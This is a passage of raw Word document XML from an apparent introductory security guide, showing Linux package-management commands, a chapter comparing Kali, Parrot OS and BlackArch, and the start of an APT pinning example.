          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt upgrade             # Upgrade installed packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install nmap        # Install a package</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt remove nmap         # Remove a package</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt search keyword      # Search for packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># pip (Python packages) - Always use this flag on Kali!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install requests --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># npm (Node.js packages)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">npm install -g docx          # Install globally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E5F8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">KALI NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5E8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">When building ERR0RS or any custom tool on Kali, always use --break-system-packages with pip. Kali is a rolling release and pip needs this flag to avoid conflicts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 5: Security Linux Distributions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Not all Linux distributions are created equal for security work. Three dominate the offensive security space: Kali Linux, Parrot OS, and BlackArch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux is the most widely used penetration testing distribution in the world. Maintained by Offensive Security (creators of the OSCP certification), it's the industry standard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on Debian (rolling release)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ships with 600+ pre-installed security tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used in professional penetration testing engagements worldwide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP exam uses Kali as the attack machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Available for x86, ARM (including Raspberry Pi), WSL2, Docker, and cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Kali-specific features:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali NetHunter: Mobile penetration testing platform (Android)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Undercover: Switches the desktop to look like Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">kali-tweaks: Built-in configuration tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">kaboxer: Container-based tool isolation for complex apps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Parrot OS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parrot OS is a lightweight, privacy-focused security distribution that's also excellent for development and daily use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Also based on Debian</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lighter on resources than Kali (better for older hardware)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes both security tools AND privacy tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parrot Home Edition for everyday use; Parrot Security for pentesting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Better for daily driving alongside security work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 BlackArch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackArch is an Arch Linux-based distribution focused on advanced security research, with the largest repository of security tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on Arch Linux (rolling release, uses pacman package manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3000+ security tools in the repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">More bleeding-edge but less stable than Kali or Parrot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incompatible with Debian/apt repos - must use Docker if combining with Kali/Parrot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E65100" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IMPORTANT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E65100" w:sz="4"/>
              <w:left w:val="single" w:color="E65100" w:sz="4"/>
              <w:bottom w:val="single" w:color="E65100" w:sz="4"/>
              <w:right w:val="single" w:color="E65100" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF3E0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">You cannot mix BlackArch and Kali/Parrot repos directly because they use different package managers (pacman vs apt) and are based on different Linux bases. Use Docker containers to isolate BlackArch tools on a Kali/Parrot system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 APT Pinning for Multi-Distribution Environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use tools from both Kali and Parrot repos on a single system (like a Raspberry Pi running Raspberry Pi OS), you can use APT pinning to control which repository gets priority:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># /etc/apt/preferences.d/pinning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Package: *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin: release n=bookworm     # Pi OS gets highest priority</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin-Priority: 1000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
